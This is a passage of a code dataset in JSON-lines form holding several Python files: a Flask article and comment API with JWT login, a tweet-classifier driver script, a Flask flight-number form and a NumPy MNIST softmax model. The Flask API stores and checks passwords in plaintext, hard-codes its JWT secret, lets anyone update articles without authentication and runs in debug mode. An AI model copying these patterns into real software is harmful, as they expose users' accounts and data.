{"api_name": "time.time", "line_number": 34, "usage_type": "call"}, {"api_name": "time.time", "line_number": 37, "usage_type": "call"}, {"api_name": "curses.init_pair", "line_number": 64, "usage_type": "call"}, {"api_name": "curses.COLOR_GREEN", "line_number": 64, "usage_type": "attribute"}, {"api_name": "curses.COLOR_BLACK", "line_number": 64, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 65, "usage_type": "call"}, {"api_name": "curses.COLOR_RED", "line_number": 65, "usage_type": "attribute"}, {"api_name": "curses.COLOR_BLACK", "line_number": 65, "usage_type": "attribute"}, {"api_name": "curses.init_pair", "line_number": 66, "usage_type": "call"}, {"api_name": "curses.COLOR_WHITE", "line_number": 66, "usage_type": "attribute"}, {"api_name": "curses.COLOR_BLACK", "line_number": 66, "usage_type": "attribute"}, {"api_name": "curses.wrapper", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "11696861124", "text": "from flask import Flask, jsonify , request \nfrom flask_sqlalchemy import SQLAlchemy\nimport datetime\nfrom flask_marshmallow import Marshmallow\nfrom flask_cors import CORS\nfrom flask_jwt_extended import create_access_token\nfrom flask_jwt_extended import get_jwt_identity, jwt_required\nfrom flask_jwt_extended import jwt_required\nfrom flask_jwt_extended import JWTManager\nfrom werkzeug.utils import secure_filename\nimport firebase_admin\nfrom firebase_admin import credentials, storage\nfrom sqlalchemy import func\nfrom werkzeug.security import check_password_hash\n\n\n\n \napp = Flask(__name__)\nCORS(app)\n\n# Setup the Flask-JWT-Extended extension\napp.config[\"JWT_SECRET_KEY\"] = \"ggghghghghghghvg\" # Change this!\njwt = JWTManager(app)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:''@localhost/flask2'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\n\n\n\nclass Articles(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100))\n video_URL = db.Column(db.Text)\n body = db.Column(db.Text)\n date = db.Column(db.DateTime, default=datetime.datetime.now)\n author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n comments = db.relationship('Comment', backref='article', lazy=True)\n course = db.Column(db.String(100))\n likes = db.relationship('Like', backref='liked_article', lazy='dynamic')\n\n\n def __init__(self, title, body, video_URL ,author_id,course):\n self.title = title\n self.body = body\n self.video_URL = video_URL\n self.author_id = author_id\n self.course = course\n\nclass Like(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n article_id_like = db.Column(db.Integer, db.ForeignKey('articles.id'))\n \n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True) \n username = db.Column(db.String(50), unique=True, nullable=False) \n password = db.Column(db.String(100), nullable=False) \n profile_picture = db.Column(db.String(200)) \n articles = db.relationship('Articles', backref='author', lazy=True) \n comments = db.relationship('Comment', backref='author', lazy=True) \n likes = db.relationship('Like', backref='user', lazy=True)\n\n\n def __init__(self, username, password , profile_picture):\n self.username = username\n self.password = password\n self.profile_picture = profile_picture\n\nclass Comment(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n content = db.Column(db.Text)\n video_URL = db.Column(db.Text)\n article_id = db.Column(db.Integer, db.ForeignKey('articles.id'))\n author_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n def __init__(self, content, article_id, author_id, video_URL=None):\n self.content = content\n self.video_URL = video_URL\n self.article_id = article_id\n self.author_id = author_id\n \n\nclass ArticleSchema(ma.Schema):\n class Meta:\n fields = ('id','title','body','date','video_URL','author_id','course')\n\narticle_schema = ArticleSchema()\narticles_schema = ArticleSchema(many=True)\n\n@app.route('/get', methods=['GET'])\ndef get_articles():\n all_articles = Articles.query.all()\n\n # Create a list to store articles and their corresponding like counts\n articles_with_likes = []\n\n for article in all_articles:\n # Count the number of likes for each article\n like_count = Like.query.filter_by(article_id_like=article.id).count()\n articles_with_likes.append((article, like_count))\n\n # Sort articles based on like counts in descending order\n sorted_articles = sorted(articles_with_likes, key=lambda x: x[1], reverse=True)\n\n articles_data = []\n\n for article, like_count in sorted_articles:\n article_data = article_schema.dump(article)\n article_data['comments'] = get_comments_data(article.id)\n article_data['like_count'] = like_count\n articles_data.append(article_data)\n\n return jsonify(articles_data)\n\ndef get_comments_data(article_id):\n article = Articles.query.get(article_id)\n if not article:\n return []\n\n comments = article.comments\n comments_data = []\n for comment in comments:\n comment_data = {\n 'id': comment.id,\n 'content': comment.content,\n 'video_URL': comment.video_URL, # Include the video_URL field\n 'author_id': comment.author_id,\n 'author_username': comment.author.username\n }\n comments_data.append(comment_data)\n\n return comments_data\n\n@app.route('/add', methods = ['POST'])\n@jwt_required()\ndef add_article():\n title = request.json['title']\n body = request.json['body']\n video_URL = request.json['video_URL']\n course = request.json['course'] \n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n article= Articles(title=title, body=body, video_URL=video_URL , course=course ,author_id=user.id)\n db.session.add(article)\n db.session.commit()\n return article_schema.jsonify(article)\n\n@app.route('/update//', methods = ['PUT'])\ndef update_article(id):\n article = Articles.query.get(id)\n title = request.json['title']\n body = request.json['body']\n video_URL = request.json['video_URL']\n course = request.json['course']\n\n article.title = title\n article.body = body\n article.video_URL = video_URL\n article.course = course\n \n db.session.commit()\n return article_schema.jsonify(article)\n\n@app.route('/delete//', methods = ['DELETE'])\n@jwt_required()\ndef article_delete(id):\n current_user = get_jwt_identity()\n article = Articles.query.get(id)\n user = User.query.filter_by(username=current_user).first()\n if user.id == article.author_id:\n db.session.delete(article)\n db.session.commit()\n else:\n return jsonify({\"msg\": \"Your not the owner\"}), 404\n return article_schema.jsonify(article)\n\n@app.route('/add-comment/', methods=['POST'])\n@jwt_required()\ndef add_comment(article_id):\n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n\n article = Articles.query.get(article_id)\n if not article:\n return jsonify({\"msg\": \"Article not found\"}), 404\n\n content = request.json['content']\n video_URL = request.json['video_URL']\n title = request.json['title']\n \n comment = Comment(content=content, video_URL=video_URL, article_id=article_id, author_id=user.id)\n db.session.add(comment)\n db.session.commit()\n return jsonify({\"msg\": \"Comment added successfully\"}), 200\n\n\n@app.route('/get-comments/', methods=['GET'])\ndef get_comments(article_id):\n article = Articles.query.get(article_id)\n if not article:\n return jsonify({\"msg\": \"Article not found\"}), 404\n\n comments = article.comments\n comments_data = []\n for comment in comments:\n comment_data = {\n 'id': comment.id,\n 'content': comment.content,\n 'author_id': comment.author_id,\n 'author_username': comment.author.username,\n 'video_URL':comment.video_URL\n }\n comments_data.append(comment_data)\n\n return jsonify(comments_data), 200\n\n\n@app.route('/delete-comment/', methods=['DELETE'])\n@jwt_required()\ndef delete_comment(comment_id):\n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n\n comment = Comment.query.get(comment_id)\n if not comment:\n return jsonify({\"msg\": \"Comment not found\"}), 404\n\n if user.id != comment.author_id:\n return jsonify({\"msg\": \"You are not the owner of this comment\"}), 403\n\n db.session.delete(comment)\n db.session.commit()\n return jsonify({\"msg\": \"Comment deleted successfully\"}), 200\n\n@app.route('/token', methods=['POST'])\ndef create_token():\n username = request.json.get(\"username\", None)\n password = request.json.get(\"password\", None)\n \n if not username or not password:\n return jsonify({\"message\": \"Username and password are required.\"}), 400\n\n user = User.query.filter_by(username=username).first()\n if not user:\n return jsonify({\"message\": \"User does not exist. Please sign up.\"}), 404\n if user.password != password:\n return jsonify({\"message\": \"incorrect password \"}), 401\n\n access_token = create_access_token(identity=username)\n return jsonify(access_token=access_token, user1=username, userId=user.id), 200\n\n\n@app.route('/signup', methods=['POST'])\ndef signup():\n data = request.get_json()\n username = data.get(\"username\")\n password = data.get(\"password\")\n profile_picture = data.get(\"profile_picture\")\n\n if not username or not password:\n return jsonify({\"message\": \"Username and password are required.\"}), 400\n\n existing_user = User.query.filter_by(username=username).first()\n\n if existing_user:\n return jsonify({\"message\": \"Username already exists. Please log in.\"}), 409\n\n # Create a new user record\n user = User(username=username, password=password, profile_picture=profile_picture)\n db.session.add(user)\n db.session.commit()\n\n access_token = create_access_token(identity=username)\n return jsonify(access_token=access_token, user1=username, userId=user.id, profile_picture=profile_picture), 200\n\n@app.route('/getuser/', methods=['GET'])\ndef get_user(article_id):\n article = Articles.query.get(article_id)\n if not article:\n return jsonify({\"msg\": \"Article not found\"}), 404\n\n user = User.query.filter_by(id=article.author_id).first()\n if user:\n user_data = {\n 'id': user.id,\n 'username': user.username,\n 'profile_picture': user.profile_picture,\n }\n print(user_data)\n return jsonify(user_data), 200\n else:\n return jsonify({\"msg\": \"User not found\"}), 404\n \n@app.route('/getuser_articles/', methods=['GET'])\ndef getuser_articles(user_id):\n user = User.query.filter_by(id=user_id).first()\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n\n all_articles = Articles.query.filter_by(author_id=user.id)\n articles_data = []\n\n for article in all_articles:\n article_data = article_schema.dump(article)\n article_data['comments'] = get_comments_data(article.id)\n articles_data.append(article_data)\n\n return jsonify(articles_data)\n\n@app.route('/search/', methods=['GET'])\ndef search_articles(search_query):\n search_results = Articles.query.filter(Articles.title.ilike(f'%{search_query}%')).all()\n\n # Create a list to store search results and their corresponding like counts\n search_results_with_likes = []\n\n for article in search_results:\n # Count the number of likes for each article\n like_count = Like.query.filter_by(article_id_like=article.id).count()\n search_results_with_likes.append((article, like_count))\n\n # Sort search results based on like counts in descending order\n sorted_search_results = sorted(search_results_with_likes, key=lambda x: x[1], reverse=True)\n\n articles_data = []\n for article, like_count in sorted_search_results:\n article_data = article_schema.dump(article)\n article_data['comments'] = get_comments_data(article.id)\n article_data['like_count'] = like_count\n articles_data.append(article_data)\n\n return jsonify(articles_data)\n\n@app.route('/search_course/', methods=['GET'])\ndef search_articlescourse(search_query):\n search_results = Articles.query.filter(Articles.course.ilike(f'%{search_query}%')).all()\n\n # Create a list to store search results and their corresponding like counts\n search_results_with_likes = []\n\n for article in search_results:\n # Count the number of likes for each article\n like_count = Like.query.filter_by(article_id_like=article.id).count()\n search_results_with_likes.append((article, like_count))\n\n # Sort search results based on like counts in descending order\n sorted_search_results = sorted(search_results_with_likes, key=lambda x: x[1], reverse=True)\n\n articles_data = []\n for article, like_count in sorted_search_results:\n article_data = article_schema.dump(article)\n article_data['comments'] = get_comments_data(article.id)\n article_data['like_count'] = like_count\n articles_data.append(article_data)\n\n return jsonify(articles_data)\n\n@app.route('/like-article/', methods=['POST'])\n@jwt_required()\ndef like_article(article_id):\n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n user_id = user.id \n article = Articles.query.get(article_id)\n if article is None:\n return jsonify({'error': 'Article not found'}), 404\n\n existing_like = Like.query.filter_by(user_id=user_id, article_id_like=article.id).first()\n if existing_like:\n db.session.delete(existing_like)\n else:\n new_like = Like(user_id=user_id, article_id_like=article.id)\n db.session.add(new_like)\n \n db.session.commit()\n\n # Get the updated likes count and return it\n likes_count = Like.query.filter_by(article_id_like=article.id).count()\n return jsonify({'likes_count': likes_count})\n\n@app.route('/get-article-likes/', methods=['GET'])\ndef get_article_likes(article_id):\n article = Articles.query.get(article_id)\n likes_count = Like.query.filter_by(article_id_like=article.id).count()\n return jsonify({'likes_count': likes_count})\n\n@app.route('/has-liked-article/', methods=['GET'])\n@jwt_required()\ndef has_liked_article(article_id):\n current_user = get_jwt_identity()\n user = User.query.filter_by(username=current_user).first()\n user_id = user.id\n article = Articles.query.get(article_id)\n if article is None:\n return jsonify({'error': 'Article not found'}), 404\n \n existing_like = Like.query.filter_by(user_id=user_id, article_id_like=article.id).first()\n if existing_like:\n return jsonify({'has_liked': True})\n else:\n return jsonify({'has_liked': False})\n\n\n@app.route('/getuser1/', methods=['GET'])\ndef get_user1(user_id):\n user = User.query.filter_by(id=user_id).first()\n if user:\n user_data = {\n 'id': user.id,\n 'username': user.username,\n 'profile_picture': user.profile_picture,\n }\n print(user_data)\n return jsonify(user_data), 200\n else:\n return jsonify({\"msg\": \"User not found\"}), 404\n \n@app.route('/update-username/', methods=['PUT'])\n@jwt_required()\ndef update_username(user_id):\n new_username = request.json.get('new_username')\n password = request.json.get('password')\n\n user = User.query.get(user_id)\n if not user:\n return jsonify({\"msg\": \"User not found\"}), 404\n\n if password != user.password:\n return jsonify({\"msg\":\"Wrong password\"}),401\n\n existing_user = User.query.filter_by(username=new_username).first()\n if existing_user:\n return jsonify({\"msg\": \"Username already exists\"}), 409\n\n user.username = new_username\n db.session.commit()\n\n return jsonify({\"msg\": \"Username updated successfully\"}), 200\n\nif __name__ == \"__main__\":\n app.run(debug=True)", "repo_name": "Kenzoe2004/ReactThreadsApp", "sub_path": "Website/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 15606, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 19, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 20, "usage_type": "call"}, {"api_name": "flask_jwt_extended.JWTManager", "line_number": 24, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 29, "usage_type": "call"}, {"api_name": "flask_marshmallow.Marshmallow", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 142, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 143, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 144, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 144, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 145, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 145, "usage_type": "name"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 146, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 149, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 160, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 160, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 161, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 161, "usage_type": "name"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 174, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 181, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 172, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 190, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 196, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 196, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 197, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 197, "usage_type": "name"}, {"api_name": "flask.request.json", "line_number": 198, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 198, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 203, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 210, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 224, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 230, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 233, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 237, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 244, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 249, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 249, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 249, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 252, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 256, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 258, "usage_type": "call"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 260, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 261, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 266, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 266, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 277, "usage_type": "call"}, {"api_name": "flask_jwt_extended.create_access_token", "line_number": 284, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 285, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 291, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 301, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 303, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 309, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 319, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 343, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 367, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 372, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 377, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 390, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 370, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 396, "usage_type": "call"}, {"api_name": "flask_jwt_extended.get_jwt_identity", "line_number": 401, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 406, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 410, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 412, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 399, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 425, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 427, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 432, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 432, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 432, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 433, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 433, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 433, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 437, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 440, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 444, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 449, "usage_type": "call"}, {"api_name": "flask_jwt_extended.jwt_required", "line_number": 430, "usage_type": "call"}]} +{"seq_id": "14947225791", "text": "import sys\nimport os\nimport pandas as pd\nimport argparse\n\nfrom artificial_neural_network import ArtificialNeuralNetwork\nfrom naive_bayes import NaiveBayes\n\nCLASSIFIER_TO_CONSTRUCTOR = {\"nb\" : NaiveBayes, \"ann\" : ArtificialNeuralNetwork}\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--train_file',\n default='kaggle_1000rows_ngram_tfidf.pkl',\n help='name of train pickle file')\n parser.add_argument('--test_file',\n type=str,\n default=None,\n help='name of test pickle file')\n parser.add_argument('--transfer_flag',\n type=int,\n default=0,\n help='flag to use transfer learning')\n\n args = parser.parse_args()\n\n dataDirPath = sys.argv[1]\n classifier_type = sys.argv[2]\n\n if not os.path.isdir(dataDirPath):\n print(\"Error: Directory \\\"\" + dataDirPath + \"\\\" does not exist.\")\n sys.exit(1)\n\n if classifier_type not in CLASSIFIER_TO_CONSTRUCTOR:\n print(\"Error: Classifier type must be one of \" +\n str(list(CLASSIFIER_TO_CONSTRUCTOR.keys())) + \".\")\n sys.exit(1)\n\n train_file = args.train_file\n test_file = args.test_file\n transfer_flag = args.transfer_flag\n\n if not os.path.isfile(os.path.join(dataDirPath, train_file)):\n print('Error: Train file ' + train_file + ' does not exist.')\n sys.exit(1)\n if test_file:\n if not os.path.isfile(os.path.join(dataDirPath, test_file)):\n print('Error: Test file' + test_file + 'does not exist.')\n sys.exit(1)\n\n # Classify data and output results to \"classifications.csv\"\n # First column is some sort of identifier for the tweets, I think \"UserName\"?\n # Second column is the class label.\n idSentiments = {}\n classifier = CLASSIFIER_TO_CONSTRUCTOR[classifier_type]()(dataDirPath, idSentiments, train_file, test_file, transfer_flag)\n print(idSentiments)\n \n if idSentiments != {}:\n pd.DataFrame(idSentiments).to_csv(\"classifications.csv\",\n header=[\"id\", \"sentiment\"], index=False)\n", "repo_name": "mtruong1999/Coronavirus-Twitter-NLP", "sub_path": "src/classify.py", "file_name": "classify.py", "file_ext": "py", "file_size_in_byte": 2242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "naive_bayes.NaiveBayes", "line_number": 9, "usage_type": "name"}, {"api_name": "artificial_neural_network.ArtificialNeuralNetwork", "line_number": 9, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 28, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "8943430751", "text": "from flask import Flask, render_template_string, request, url_for\nfrom flight_data import FlightData\nfrom pydantic import ValidationError\n\napp = Flask(__name__)\n\n# serve the homepage to the user\n@app.route('/', methods=['GET'])\ndef index():\n # render the form for the user input\n return render_template_string('''\n
\n Flight Number:
\n \n
\n ''')\n\n@app.route('/submit_form', methods=['POST'])\ndef submit_form():\n try:\n # validate inputs using pydantic\n flight_data = FlightData(flight_number=request.form['flight_number'])\n # process valid input\n return f\"Flight number: {flight_data.flight_number} submitted. Processing your request.\"\n except ValidationError as e:\n \" Handle validation errors\"\n return render_template_string(\"\"\"\n Invalid flight number format. Try again.\n \"\"\")\n\nif __name__ == '__main__':\n app.run(debug=True)", "repo_name": "Twist333d/FamilyFlightTracker", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template_string", "line_number": 11, "usage_type": "call"}, {"api_name": "flight_data.FlightData", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 22, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 22, "usage_type": "name"}, {"api_name": "flight_data.flight_number", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pydantic.ValidationError", "line_number": 25, "usage_type": "name"}, {"api_name": "flask.render_template_string", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "42512010777", "text": "# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nCreated on Thu Oct 19 15:19:58 2017\r\n\r\n@author: lamwa\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom tensorflow.examples.tutorials.mnist import input_data\r\nimport matplotlib.pyplot as plt\r\n\r\nclass Model():\r\n def __init__(self):\r\n mnist = input_data.read_data_sets('MNIST_data', one_hot=True)\r\n self.n_in = 784 # 28 * 28\r\n self.n_out = 10 # 10 classes\r\n self.max_epochs = 10000 # max training steps 10000\r\n self.Weights = np.random.rand(self.n_in, self.n_out) # initialize W 0\r\n\r\n self.biases = np.zeros(self.n_out) # initialize bias 0\r\n \r\n self.training_loss = []\r\n self.training_acc = []\r\n self.validation_loss = []\r\n self.validation_acc = []\r\n for i in range(self.max_epochs):\r\n batch_xs, batch_ys = mnist.train.next_batch(100)\r\n batch_xs = np.array(batch_xs)\r\n batch_ys = np.array(batch_ys)\r\n \r\n self.training_loss.append(self.train(batch_xs, batch_ys, 0.0001))\r\n self.training_acc.append(self.compute_accuracy(batch_xs, batch_ys))\r\n if i % 500 == 0:\r\n accuracy_test = self.compute_accuracy(np.array(mnist.test.images[: 500]), np.array(mnist.test.labels[: 500]))\r\n self.validation_acc.append(accuracy_test)\r\n print(\"#\" * 30)\r\n print(\"compute_accuracy:\", accuracy_test)\r\n loss = self.cross_entropy(batch_ys, self.output(batch_xs))\r\n print(\"cross_entropy:\", loss) # print out cross entropy loss function\r\n self.validation_loss.append(loss)\r\n \r\n def train(self, batch_x, batch_y, learning_rate):\r\n probs = self.output(batch_x)\r\n delta = probs - batch_y\r\n dW = batch_x.T.dot(delta)\r\n db = np.sum(delta, axis=0)\r\n self.Weights += -learning_rate * dW\r\n self.biases += -learning_rate * db\r\n return self.cross_entropy(batch_y, probs)\r\n \r\n def output(self, batch_x): # print out the predictions\r\n # avoiding overflow\r\n def softmax(x):\r\n e_x = np.exp(x - np.max(x))\r\n return e_x / (e_x.sum(axis=0)) + 1e-30 #\r\n prediction = np.add(np.dot(batch_x, self.Weights), self.biases)\r\n result = []\r\n for i in range(len(prediction)):\r\n result.append(softmax(prediction[i]))\r\n return np.array(result)\r\n \r\n def cross_entropy(self, batch_y, prediction_y): # cross entropy function\r\n cross_entropy = - np.mean(\r\n np.sum(batch_y * np.log(prediction_y), axis=1))\r\n return cross_entropy\r\n \r\n def compute_accuracy(self, xs, ys): # computing the accuracy\r\n pre_y = self.output(xs)\r\n pre_y_index = np.argmax(pre_y, axis=1)\r\n y_index = np.argmax(ys, axis=1)\r\n count_equal = np.equal(y_index, pre_y_index)\r\n count = np.sum([1 for e in count_equal if e ])\r\n sum_count = len(xs)\r\n return count * 1.0 / sum_count\r\n\r\nmodel = Model()\r\nepochs_t = np.linspace(0, 9999, 10000)\r\nepochs_v = np.linspace(0, 9500, 20)\r\nplt.plot(epochs_t, model.training_acc, 'r', label=\"training accuracy\")\r\nplt.plot(epochs_v, model.validation_acc, 'b', label=\"testing accuracy\")\r\n#plt.axis([0, 100, 0, 0.3])\r\nplt.legend(loc='lower right')\r\nplt.xlabel('epochs')\r\nplt.ylabel('accuracy')\r\nplt.savefig('plot1.eps', format='eps', dpi=1000)\r\nplt.show()\r\n\r\nplt.close()\r\n\r\nplt.plot(epochs_t, model.training_loss, 'r', label=\"training loss\")\r\nplt.plot(epochs_v, model.validation_loss, 'b', label=\"testing loss\")\r\n#plt.axis([0, 100, 0, 0.3])\r\nplt.legend(loc='upper right')\r\nplt.xlabel('epochs')\r\nplt.ylabel('loss')\r\nplt.savefig('plot2.eps', format='eps', dpi=1000)\r\n", "repo_name": "uuzeeex/undergrad-courses", "sub_path": "Nerual_Networks_and_Deep_Learning/Project_1/Exercise_2/model_np.py", "file_name": "model_np.py", "file_ext": "py", "file_size_in_byte": 3729, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 19, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 65, "usage_type": "call"}, {"api_name": 